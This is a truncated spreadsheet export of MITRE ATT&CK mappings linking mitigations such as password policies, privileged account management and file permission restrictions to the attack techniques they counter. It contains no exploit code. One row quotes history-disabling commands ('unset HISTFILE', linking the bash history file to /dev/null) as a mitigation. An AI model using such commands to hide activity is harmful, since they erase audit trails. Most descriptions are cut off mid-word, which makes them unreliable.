M1028 Operating course-of- mitigation mitigates T1087.001Local Acco attack-pat technique Prevent ad
M1028 Operating course-of- mitigation mitigates T1556 Modify Autattack-pat technique Starting in Windows 11 22H2
M1028 Operating course-of- mitigation mitigates T1556.008Network Prattack-pat technique Starting in
M1028 Operating course-of- mitigation mitigates T1135 Network Shattack-pat technique Enable Win
M1028 Operating course-of- mitigation mitigates T1003 OS Credentattack-pat technique Consider disabling or restricti
M1028 Operating course-of- mitigation mitigates T1556.002Password Fiattack-pat technique Ensure onl
M1028 Operating course-of- mitigation mitigates T1563.002RDP Hijackattack-pat technique Change GPO
M1028 Operating course-of- mitigation mitigates T1021.001Remote Des attack-pat technique Change GPO
M1028 Operating course-of- mitigation mitigates T1053.005Scheduled attack-pat technique Configure s
M1028 Operating course-of- mitigation mitigates T1053 Scheduled attack-pat technique Configure s
M1028 Operating course-of- mitigation mitigates T1003.002Security A attack-pat technique Consider di
M1028 Operating course-of- mitigation mitigates T1548.001Setuid and attack-pat technique Application
M1028 Operating course-of- mitigation mitigates T1553 Subvert Truattack-pat technique Windows Gr
M1028 Operating course-of- mitigation mitigates T1548.003Sudo and Sattack-pat technique Ensuring th
M1028 Operating course-of- mitigation mitigates T1542.005TFTP Boot attack-pat technique Follow vend HISTFILE</code
<code>unset
M1028 Operating course-of- mitigation mitigates T1552 Unsecuredattack-pat technique <code>ln -s /dev/null ~/.bash
M1028 Operating course-of- mitigation mitigates T1543.003Windows Se attack-pat technique Ensure that
M1060 Out-of-Bancourse-of- mitigation mitigates T1213 Data from attack-pat technique Create plan
M1060 Out-of-Bancourse-of- mitigation mitigates T1114 Email Colleattack-pat technique Use secure
M1060 Out-of-Bancourse-of- mitigation mitigates T1114.003Email Forwattack-pat technique Create plans for leveraging a
M1060 Out-of-Bancourse-of- mitigation mitigates T1114.001Local Emailattack-pat technique Implement s
M1060 Out-of-Bancourse-of- mitigation mitigates T1213.005Messaging attack-pat technique Implement
M1060 Out-of-Bancourse-of- mitigation mitigates T1114.002Remote Ema attack-pat technique Create plans for leveraging a
M1060 Out-of-Bancourse-of- mitigation mitigates T1489 Service Stoattack-pat technique Develop and
M1027 Password Pcourse-of- mitigation mitigates T1003.008/etc/passwattack-pat technique Ensure tha
M1027 Password Pcourse-of- mitigation mitigates T1558.004AS-REP Roaattack-pat technique Ensure stro
M1027 Password Pcourse-of- mitigation mitigates T1110 Brute Forc attack-pat technique Refer to NI
M1027 Password Pcourse-of- mitigation mitigates T1003.005Cached Dom attack-pat technique Ensure that
M1027 Password Pcourse-of- mitigation mitigates T1078.004Cloud Accoattack-pat technique Ensure that
M1027 Password Pcourse-of- mitigation mitigates T1110.004Credential attack-pat technique Refer to NI
M1027 Password Pcourse-of- mitigation mitigates T1552.001Credentialsattack-pat technique Establish a
M1027 Password Pcourse-of- mitigation mitigates T1555 Credential attack-pat technique Organizations may consider w
M1027 Password Pcourse-of- mitigation mitigates T1555.003Credential attack-pat technique Organizatio
M1027 Password Pcourse-of- mitigation mitigates T1552.002Credentialsattack-pat technique Do not stor
M1027 Password Pcourse-of- mitigation mitigates T1003.006DCSync attack-pat technique Ensure that
M1027 Password Pcourse-of- mitigation mitigates T1078.001Default Ac attack-pat technique Application
M1027 Password Pcourse-of- mitigation mitigates T1078.002Domain Acattack-pat technique Implement a
M1027 Password Pcourse-of- mitigation mitigates T1601.002Downgradeattack-pat technique Refer to NI
M1027 Password Pcourse-of- mitigation mitigates T1187 Forced Autattack-pat technique Use strong
M1027 Password Pcourse-of- mitigation mitigates T1558.003Kerberoastattack-pat technique Ensure stro
M1027 Password Pcourse-of- mitigation mitigates T1555.001Keychain attack-pat technique The passwor
M1027 Password Pcourse-of- mitigation mitigates T1003.004LSA Secret attack-pat technique Ensure that
M1027 Password Pcourse-of- mitigation mitigates T1003.001LSASS Memattack-pat technique Ensure that
M1027 Password Pcourse-of- mitigation mitigates T1078.003Local Acco attack-pat technique Ensure that
M1027 Password Pcourse-of- mitigation mitigates T1556 Modify Autattack-pat technique Ensure tha
M1027 Password Pcourse-of- mitigation mitigates T1601 Modify Sysattack-pat technique Refer to NI
M1027 Password Pcourse-of- mitigation mitigates T1003.003NTDS attack-pat technique Ensure that
M1027 Password Pcourse-of- mitigation mitigates T1599.001Network Adattack-pat technique Refer to NI
M1027 Password Pcourse-of- mitigation mitigates T1599 Network Boattack-pat technique Refer to NI
M1027 Password Pcourse-of- mitigation mitigates T1003 OS Credentattack-pat technique Ensure that
M1027 Password Pcourse-of- mitigation mitigates T1550.003Pass the Tiattack-pat technique Ensure tha
M1027 Password Pcourse-of- mitigation mitigates T1110.002Password Cattack-pat technique Refer to NI
M1027 Password Pcourse-of- mitigation mitigates T1110.001Password Gattack-pat technique Refer to NI
M1027 Password Pcourse-of- mitigation mitigates T1555.005Password attack-pat technique Refer to NI
M1027 Password Pcourse-of- mitigation mitigates T1201 Password Pattack-pat technique Ensure onl
M1027 Password Pcourse-of- mitigation mitigates T1110.003Password Sattack-pat technique Refer to NI
M1027 Password Pcourse-of- mitigation mitigates T1601.001Patch Syst attack-pat technique Refer to NI
M1027 Password Pcourse-of- mitigation mitigates T1552.004Private Keyattack-pat technique Use strong
M1027 Password Pcourse-of- mitigation mitigates T1003.007Proc Files attack-pat technique Ensure tha
M1027 Password Pcourse-of- mitigation mitigates T1563 Remote Serattack-pat technique Set and enf
M1027 Password Pcourse-of- mitigation mitigates T1021 Remote Serattack-pat technique Do not reu
M1027 Password Pcourse-of- mitigation mitigates T1556.005Reversible attack-pat technique Ensure tha
M1027 Password Pcourse-of- mitigation mitigates T1021.002SMB/Windo attack-pat technique Do not reu
M1027 Password Pcourse-of- mitigation mitigates T1563.001SSH Hijack attack-pat technique Ensure SSH
M1027 Password Pcourse-of- mitigation mitigates T1003.002Security A attack-pat technique Ensure that
M1027 Password Pcourse-of- mitigation mitigates T1558.002Silver Tickeattack-pat technique Ensure stro
M1027 Password Pcourse-of- mitigation mitigates T1072 Software Dattack-pat technique Verify tha
M1027 Password Pcourse-of- mitigation mitigates T1558 Steal or Foattack-pat technique Ensure stro
M1027 Password Pcourse-of- mitigation mitigates T1552 Unsecuredattack-pat technique Use strong
M1027 Password Pcourse-of- mitigation mitigates T1550 Use Altern attack-pat technique Set and enf
M1027 Password Pcourse-of- mitigation mitigates T1078 Valid Acco attack-pat technique Policies should minimize (if n
M1056 Pre-comprcourse-of- mitigation mitigates T1650 Acquire Acattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1583 Acquire Infattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1595 Active Sca attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1588.007Artificial I attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1583.005Botnet attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1584.005Botnet attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1591.002Business Reattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1596.004CDNs attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1592.004Client Confattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1586.003Cloud Accoattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1585.003Cloud Accoattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1587.002Code Signinattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1588.003Code Signinattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1586 Compromisattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1584 Compromise attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1589.001Credentialsattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1583.002DNS Serverattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1584.002DNS Serverattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1596.001DNS/Passi attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1591.001Determine attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1587 Develop Cap attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1596.003Digital Certattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1588.004Digital Certattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1587.003Digital Certattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1590.001Domain Proattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1583.001Domains attack-pat technique Organizatio
M1056 Pre-comprcourse-of- mitigation mitigates T1584.001Domains attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1608.004Drive-by T attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1586.002Email Accoattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1585.002Email Accoattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1589.002Email Addrattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1589.003Employee attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1585 Establish attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1587.004Exploits attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1588.005Exploits attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1592.003Firmware attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1592 Gather Vic attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1589 Gather Victattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1590 Gather Vic attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1591 Gather Vic attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1592.001Hardware attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1590.005IP Address attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1591.003Identify B attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1591.004Identify Roattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1608.003Install Digi attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1608.005Link Targetattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1583.008Malvertisi attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1587.001Malware attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1588.001Malware attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1584.008Network Deattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1590.006Network Seattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1590.004Network T attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1590.003Network Trattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1588 Obtain Capa attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1597.002Purchase Tattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1608.006SEO Poisonattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1596.005Scan Databattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1595.001Scanning IPattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1597 Search Clo attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1593.002Search Engattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1596 Search Opeattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1594 Search Vic attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1583.004Server attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1584.004Server attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1583.007Serverless attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1584.007Serverless attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1593.001Social Medattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1586.001Social Medattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1585.001Social Medattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1592.002Software attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1608 Stage Capab attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1597.001Threat Inteattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1588.002Tool attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1608.001Upload Maattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1608.002Upload Tooattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1584.003Virtual Pri attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1583.003Virtual Pri attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1588.006Vulnerabiliattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1595.002Vulnerabiliattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1596.002WHOIS attack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1583.006Web Servicattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1584.006Web Servicattack-pat technique This techni
M1056 Pre-comprcourse-of- mitigation mitigates T1595.003Wordlist S attack-pat technique This techni
M1026 Privileged course-of- mitigation mitigates T1003.008/etc/passwattack-pat technique Follow best
M1026 Privileged course-of- mitigation mitigates T1548 Abuse Elevattack-pat technique By requiring a password, eve
M1026 Privileged course-of- mitigation mitigates T1134 Access Tokattack-pat technique Administrators should log in
M1026 Privileged course-of- mitigation mitigates T1098 Account Ma attack-pat technique Do not allo
M1026 Privileged course-of- mitigation mitigates T1098.001Additional attack-pat technique Do not allo
M1026 Privileged course-of- mitigation mitigates T1098.003Additional attack-pat technique Ensure that
M1026 Privileged course-of- mitigation mitigates T1098.002Additional attack-pat technique Do not allo
M1026 Privileged course-of- mitigation mitigates T1053.002At attack-pat technique Configure t
M1026 Privileged course-of- mitigation mitigates T1542.003Bootkit attack-pat technique Ensure prop
M1026 Privileged course-of- mitigation mitigates T1612 Build Imagattack-pat technique Ensure cont
M1026 Privileged course-of- mitigation mitigates T1548.002Bypass Useattack-pat technique Remove use
M1026 Privileged course-of- mitigation mitigates T1003.005Cached Dom attack-pat technique Do not put
M1026 Privileged course-of- mitigation mitigates T1059.009Cloud API attack-pat technique Use of prop
M1026 Privileged course-of- mitigation mitigates T1136.003Cloud Accoattack-pat technique Limit the n
M1026 Privileged course-of- mitigation mitigates T1078.004Cloud Accoattack-pat technique Review priv
M1026 Privileged course-of- mitigation mitigates T1651 Cloud Admattack-pat technique Limit the n
M1026 Privileged course-of- mitigation mitigates T1555.006Cloud Secrattack-pat technique Limit the n
M1026 Privileged course-of- mitigation mitigates T1021.007Cloud Servattack-pat technique Limit the n
M1026 Privileged course-of- mitigation mitigates T1553.006Code Signinattack-pat technique Limit the u
M1026 Privileged course-of- mitigation mitigates T1059 Command attack-pat
an technique PowerShell JEA (Just Enough
M1026 Privileged course-of- mitigation mitigates T1559.001Componentattack-pat technique Modify Registry settings (dire
M1026 Privileged course-of- mitigation mitigates T1552.007Container attack-pat technique Use the pri
M1026 Privileged course-of- mitigation mitigates T1609 Container attack-pat technique Ensure cont
M1026 Privileged course-of- mitigation mitigates T1053.007Container attack-pat technique Ensure cont
M1026 Privileged course-of- mitigation mitigates T1136 Create Accattack-pat technique Limit the n
M1026 Privileged course-of- mitigation mitigates T1134.002Create Proattack-pat technique Administrators should log in
M1026 Privileged course-of- mitigation mitigates T1543 Create or attack-pat technique Manage the
M1026 Privileged course-of- mitigation mitigates T1555 Credential attack-pat technique Limit the n
M1026 Privileged course-of- mitigation mitigates T1552.002Credentialsattack-pat technique If it is ne
M1026 Privileged course-of- mitigation mitigates T1003.006DCSync attack-pat technique Do not put
M1026 Privileged course-of- mitigation mitigates T1021.003Distribute attack-pat technique Modify Registry settings (dire
M1026 Privileged course-of- mitigation mitigates T1136.002Domain Acattack-pat technique Limit the n
M1026 Privileged course-of- mitigation mitigates T1078.002Domain Acattack-pat technique Audit domai
M1026 Privileged course-of- mitigation mitigates T1556.001Domain Con attack-pat technique Audit domai
M1026 Privileged course-of- mitigation mitigates T1484 Domain or attack-pat technique Use least p
M1026 Privileged course-of- mitigation mitigates T1601.002Downgradeattack-pat technique Restrict ad
M1026 Privileged course-of- mitigation mitigates T1611 Escape to attack-pat technique Ensure cont
M1026 Privileged course-of- mitigation mitigates T1546 Event Trig attack-pat technique Manage the
M1026 Privileged course-of- mitigation mitigates T1190 Exploit Pubattack-pat technique Use least p
M1026 Privileged course-of- mitigation mitigates T1210 Exploitatioattack-pat technique Minimize pe
M1026 Privileged course-of- mitigation mitigates T1222 File and Di attack-pat technique Ensure crit
M1026 Privileged course-of- mitigation mitigates T1495 Firmware Cattack-pat technique Prevent adv
M1026 Privileged course-of- mitigation mitigates T1606 Forge Webattack-pat technique Restrict pe
M1026 Privileged course-of- mitigation mitigates T1558.001Golden Ticattack-pat technique Limit domai
M1026 Privileged course-of- mitigation mitigates T1556.007Hybrid Idenattack-pat technique Limit on-pr
M1026 Privileged course-of- mitigation mitigates T1505.004IIS Componattack-pat technique Do not allo
M1026 Privileged course-of- mitigation mitigates T1525 Implant In attack-pat technique Limit permi
M1026 Privileged course-of- mitigation mitigates T1559 Inter-Proc attack-pat technique Modify Registry settings (dire
M1026 Privileged course-of- mitigation mitigates T1558.003Kerberoastattack-pat technique Limit servi
M1026 Privileged course-of- mitigation mitigates T1547.006Kernel Modattack-pat technique Limit acces
M1026 Privileged course-of- mitigation mitigates T1003.004LSA Secret attack-pat technique Follow best
M1026 Privileged course-of- mitigation mitigates T1003.001LSASS Memattack-pat technique Do not put
M1026 Privileged course-of- mitigation mitigates T1222.002Linux and M attack-pat technique Ensure crit
M1026 Privileged course-of- mitigation mitigates T1136.001Local Acco attack-pat technique Limit the n
M1026 Privileged course-of- mitigation mitigates T1078.003Local Acco attack-pat technique For example, audit the use of
M1026 Privileged course-of- mitigation mitigates T1134.003Make and attack-pat technique Administrators should log in
M1026 Privileged course-of- mitigation mitigates T1556 Modify Autattack-pat technique Limit on-premises accounts w
M1026 Privileged course-of- mitigation mitigates T1601 Modify Sysattack-pat technique Restrict ad
M1026 Privileged course-of- mitigation mitigates T1218.007Msiexec attack-pat technique Restrict ex
M1026 Privileged course-of- mitigation mitigates T1003.003NTDS attack-pat technique Do not put
M1026 Privileged course-of- mitigation mitigates T1599.001Network Adattack-pat technique Restrict ad
M1026 Privileged course-of- mitigation mitigates T1599 Network Boattack-pat technique Restrict ad
M1026 Privileged course-of- mitigation mitigates T1556.004Network Deattack-pat technique Restrict ad
M1026 Privileged course-of- mitigation mitigates T1059.008Network Deattack-pat technique Use of Auth
Linux:
M1026 Privileged course-of- mitigation mitigates T1003 OS Credentattack-pat technique Scraping the passwords from
M1026 Privileged course-of- mitigation mitigates T1550.002Pass the H attack-pat technique Limit cred
M1026 Privileged course-of- mitigation mitigates T1550.003Pass the Tiattack-pat technique Limit domai
M1026 Privileged course-of- mitigation mitigates T1601.001Patch Syst attack-pat technique Restrict ad
M1026 Privileged course-of- mitigation mitigates T1556.003Pluggable attack-pat technique Limit acces
M1026 Privileged course-of- mitigation mitigates T1059.001PowerShellattack-pat technique PowerShell JEA (Just Enough
M1026 Privileged course-of- mitigation mitigates T1542 Pre-OS Booattack-pat technique Ensure prop
M1026 Privileged course-of- mitigation mitigates T1003.007Proc Files attack-pat technique Follow best
M1026 Privileged course-of- mitigation mitigates T1055 Process Injattack-pat technique Utilize Yam
M1026 Privileged course-of- mitigation mitigates T1055.008Ptrace Systattack-pat technique Utilize Yam
M1026 Privileged course-of- mitigation mitigates T1563.002RDP Hijackattack-pat technique Consider re
M1026 Privileged course-of- mitigation mitigates T1021.001Remote Des attack-pat technique Consider re
M1026 Privileged course-of- mitigation mitigates T1563 Remote Serattack-pat technique Do not allo
M1026 Privileged course-of- mitigation mitigates T1556.005Reversible attack-pat technique Audit domai
M1026 Privileged course-of- mitigation mitigates T1606.002SAML Tokeattack-pat technique Restrict pe
M1026 Privileged course-of- mitigation mitigates T1021.002SMB/Windo attack-pat technique Deny remote
M1026 Privileged course-of- mitigation mitigates T1505.001SQL Storedattack-pat technique Do not allo
M1026 Privileged course-of- mitigation mitigates T1563.001SSH Hijack attack-pat technique Do not allo
M1026 Privileged course-of- mitigation mitigates T1562.009Safe Modeattack-pat technique Restrict ad
M1026 Privileged course-of- mitigation mitigates T1053.005Scheduled attack-pat technique Configure t
M1026 Privileged course-of- mitigation mitigates T1053 Scheduled attack-pat technique Configure t
M1026 Privileged course-of- mitigation mitigates T1003.002Security A attack-pat technique Do not put
M1026 Privileged course-of- mitigation mitigates T1505 Server Sof attack-pat technique Do not allo
M1026 Privileged course-of- mitigation mitigates T1569.002Service Ex attack-pat technique Ensure that
M1026 Privileged course-of- mitigation mitigates T1558.002Silver Tickeattack-pat technique Limit servi
M1026 Privileged course-of- mitigation mitigates T1072 Software Dattack-pat technique Grant acces
M1026 Privileged course-of- mitigation mitigates T1558 Steal or Foattack-pat technique Limit service accounts to min
M1026 Privileged course-of- mitigation mitigates T1553 Subvert Truattack-pat technique Manage the
M1026 Privileged course-of- mitigation mitigates T1548.003Sudo and Sattack-pat technique By requirin
M1026 Privileged course-of- mitigation mitigates T1218 System Binattack-pat technique Restrict ex
M1026 Privileged course-of- mitigation mitigates T1542.001System Fi attack-pat technique Prevent adv
M1026 Privileged course-of- mitigation mitigates T1569 System Serattack-pat technique Ensure that
M1026 Privileged course-of- mitigation mitigates T1543.002Systemd Seattack-pat technique The creatio
M1026 Privileged course-of- mitigation mitigates T1053.006Systemd Tiattack-pat technique Limit acces
M1026 Privileged course-of- mitigation mitigates T1548.006TCC Manipu attack-pat technique Remove unn
M1026 Privileged course-of- mitigation mitigates T1542.005TFTP Boot attack-pat technique Use of Auth
M1026 Privileged course-of- mitigation mitigates T1134.001Token Impeattack-pat technique Administrators should log in
M1026 Privileged course-of- mitigation mitigates T1505.002Transport attack-pat technique Do not allo
M1026 Privileged course-of- mitigation mitigates T1484.002Trust Modifattack-pat technique Use the pri
M1026 Privileged course-of- mitigation mitigates T1552 Unsecuredattack-pat technique If it is ne
M1026 Privileged course-of- mitigation mitigates T1550 Use Altern attack-pat technique Limit cred
M1026 Privileged course-of- mitigation mitigates T1078 Valid Acco attack-pat technique Audit domai
M1026 Privileged course-of- mitigation mitigates T1056.003Web Portalattack-pat technique Do not allo
M1026 Privileged course-of- mitigation mitigates T1222.001Windows Fiattack-pat technique Ensure crit
M1026 Privileged course-of- mitigation mitigates T1047 Windows M attack-pat technique Prevent cre
M1026 Privileged course-of- mitigation mitigates T1546.003Windows Ma attack-pat technique Prevent cre
M1026 Privileged course-of- mitigation mitigates T1021.006Windows Rattack-pat technique If the serv
M1025 Privileged course-of- mitigation mitigates T1547.002Authenticaattack-pat technique Windows 8.
M1025 Privileged course-of- mitigation mitigates T1556.001Domain Con attack-pat technique Enabled fea
M1025 Privileged course-of- mitigation mitigates T1547.008LSASS Driv attack-pat technique On Windows
M1025 Privileged course-of- mitigation mitigates T1003.001LSASS Memattack-pat technique On Windows
M1025 Privileged course-of- mitigation mitigates T1556 Modify Autattack-pat technique Enabled fea
M1025 Privileged course-of- mitigation mitigates T1003 OS Credentattack-pat technique On Windows 8.1 and Window
M1025 Privileged course-of- mitigation mitigates T1547.005Security Suattack-pat technique Windows 8.
M1029 Remote Datcourse-of- mitigation mitigates T1119 Automatedattack-pat technique Encryption
M1029 Remote Datcourse-of- mitigation mitigates T1070.003Clear Comm attack-pat technique Forward log
M1029 Remote Datcourse-of- mitigation mitigates T1070.002Clear Linu attack-pat technique Automatical
M1029 Remote Datcourse-of- mitigation mitigates T1070.008Clear Mail attack-pat technique Automatical
M1029 Remote Datcourse-of- mitigation mitigates T1070.007Clear Netwattack-pat technique Automatical
M1029 Remote Datcourse-of- mitigation mitigates T1070.009Clear Persiattack-pat technique Automatical
M1029 Remote Datcourse-of- mitigation mitigates T1070.001Clear Windattack-pat technique Automatical
M1029 Remote Datcourse-of- mitigation mitigates T1565 Data Manipattack-pat technique Consider im
M1029 Remote Datcourse-of- mitigation mitigates T1070 Indicator attack-pat technique Automatical
M1029 Remote Datcourse-of- mitigation mitigates T1072 Software Dattack-pat technique If the appl
M1029 Remote Datcourse-of- mitigation mitigates T1565.001Stored Datattack-pat technique Consider im
M1022 Restrict Fi course-of- mitigation mitigates T1548 Abuse Elevattack-pat technique The sudoers
M1022 Restrict Fi course-of- mitigation mitigates T1098 Account Ma attack-pat technique Restrict ac
M1022 Restrict Fi course-of- mitigation mitigates T1574.014AppDomaiattack-pat technique Install .NE
M1022 Restrict Fi course-of- mitigation mitigates T1037 Boot or Logattack-pat technique Restrict wr
M1022 Restrict Fi course-of- mitigation mitigates T1070.003Clear Comm attack-pat technique Preventing
M1022 Restrict Fi course-of- mitigation mitigates T1070.002Clear Linu attack-pat technique Protect gen
M1022 Restrict Fi course-of- mitigation mitigates T1070.008Clear Mail attack-pat technique Protect gen
M1022 Restrict Fi course-of- mitigation mitigates T1070.009Clear Persiattack-pat technique Protect gen
M1022 Restrict Fi course-of- mitigation mitigates T1070.001Clear Windattack-pat technique Protect gen
M1022 Restrict Fi course-of- mitigation mitigates T1218.002Control Pa attack-pat technique Restrict st
M1022 Restrict Fi course-of- mitigation mitigates T1543 Create or attack-pat technique Restrict re
M1022 Restrict Fi course-of- mitigation mitigates T1552.001Credentialsattack-pat technique Restrict fi
M1022 Restrict Fi course-of- mitigation mitigates T1565 Data Manipattack-pat technique Ensure leas
M1022 Restrict Fi course-of- mitigation mitigates T1530 Data from attack-pat technique Use access
M1022 Restrict Fi course-of- mitigation mitigates T1562.002Disable Wiattack-pat technique Ensure prop
M1022 Restrict Fi course-of- mitigation mitigates T1562.004Disable or attack-pat technique Ensure prop
M1022 Restrict Fi course-of- mitigation mitigates T1562.001Disable or attack-pat technique Ensure prop
M1022 Restrict Fi course-of- mitigation mitigates T1574.004Dylib Hijac attack-pat technique Set directo
M1022 Restrict Fi course-of- mitigation mitigates T1048 Exfiltratio attack-pat technique Use access
M1022 Restrict Fi course-of- mitigation mitigates T1222 File and Di attack-pat technique Applying mo
M1022 Restrict Fi course-of- mitigation mitigates T1574 Hijack Exe attack-pat technique Install sof
M1022 Restrict Fi course-of- mitigation mitigates T1562 Impair Defattack-pat technique Ensure prop
M1022 Restrict Fi course-of- mitigation mitigates T1562.006Indicator Battack-pat technique Ensure even
M1022 Restrict Fi course-of- mitigation mitigates T1070 Indicator attack-pat technique Protect gen
M1022 Restrict Fi course-of- mitigation mitigates T1543.001Launch Ageattack-pat technique Set group p
M1022 Restrict Fi course-of- mitigation mitigates T1222.002Linux and M attack-pat technique Applying mo
M1022 Restrict Fi course-of- mitigation mitigates T1037.002Login Hookattack-pat technique Restrict wr
M1022 Restrict Fi course-of- mitigation mitigates T1036 Masqueradattack-pat technique Use file sy
M1022 Restrict Fi course-of- mitigation mitigates T1036.005Match Legiattack-pat technique Use file sy
M1022 Restrict Fi course-of- mitigation mitigates T1556 Modify Autattack-pat technique Restrict wr
M1022 Restrict Fi course-of- mitigation mitigates T1564.004NTFS File Aattack-pat technique Consider ad
M1022 Restrict Fi course-of- mitigation mitigates T1037.003Network Loattack-pat technique Restrict wr
M1022 Restrict Fi course-of- mitigation mitigates T1574.007Path Inter attack-pat technique Ensure that
M1022 Restrict Fi course-of- mitigation mitigates T1574.008Path Intercattack-pat technique Ensure that
M1022 Restrict Fi course-of- mitigation mitigates T1574.009Path Inter attack-pat technique Ensure that
M1022 Restrict Fi course-of- mitigation mitigates T1546.013PowerShellattack-pat technique Making Powe
M1022 Restrict Fi course-of- mitigation mitigates T1552.004Private Keyattack-pat technique Ensure perm
M1022 Restrict Fi course-of- mitigation mitigates T1055.009Proc Memoattack-pat technique Restrict t
M1022 Restrict Fi course-of- mitigation mitigates T1037.004RC Scripts attack-pat technique Limit privi
M1022 Restrict Fi course-of- mitigation mitigates T1036.003Rename Sys attack-pat technique Use file sy
M1022 Restrict Fi course-of- mitigation mitigates T1565.003Runtime Daattack-pat technique Prevent cri
M1022 Restrict Fi course-of- mitigation mitigates T1553.003SIP and Truattack-pat technique Restrict st
M1022 Restrict Fi course-of- mitigation mitigates T1098.004SSH Authorattack-pat technique Restrict ac
M1022 Restrict Fi course-of- mitigation mitigates T1563.001SSH Hijack attack-pat technique Ensure prop
M1022 Restrict Fi course-of- mitigation mitigates T1053 Scheduled attack-pat technique Restrict ac
M1022 Restrict Fi course-of- mitigation mitigates T1569.002Service Ex attack-pat technique Ensure that
M1022 Restrict Fi course-of- mitigation mitigates T1489 Service Stoattack-pat technique Ensure prop
M1022 Restrict Fi course-of- mitigation mitigates T1547.009Shortcut Mattack-pat technique Applying st
M1022 Restrict Fi course-of- mitigation mitigates T1037.005Startup It attack-pat technique Since Start
M1022 Restrict Fi course-of- mitigation mitigates T1565.001Stored Datattack-pat technique Ensure leas
M1022 Restrict Fi course-of- mitigation mitigates T1548.003Sudo and Sattack-pat technique The sudoers
M1022 Restrict Fi course-of- mitigation mitigates T1569 System Serattack-pat technique Ensure that
M1022 Restrict Fi course-of- mitigation mitigates T1543.002Systemd Seattack-pat technique Restrict re
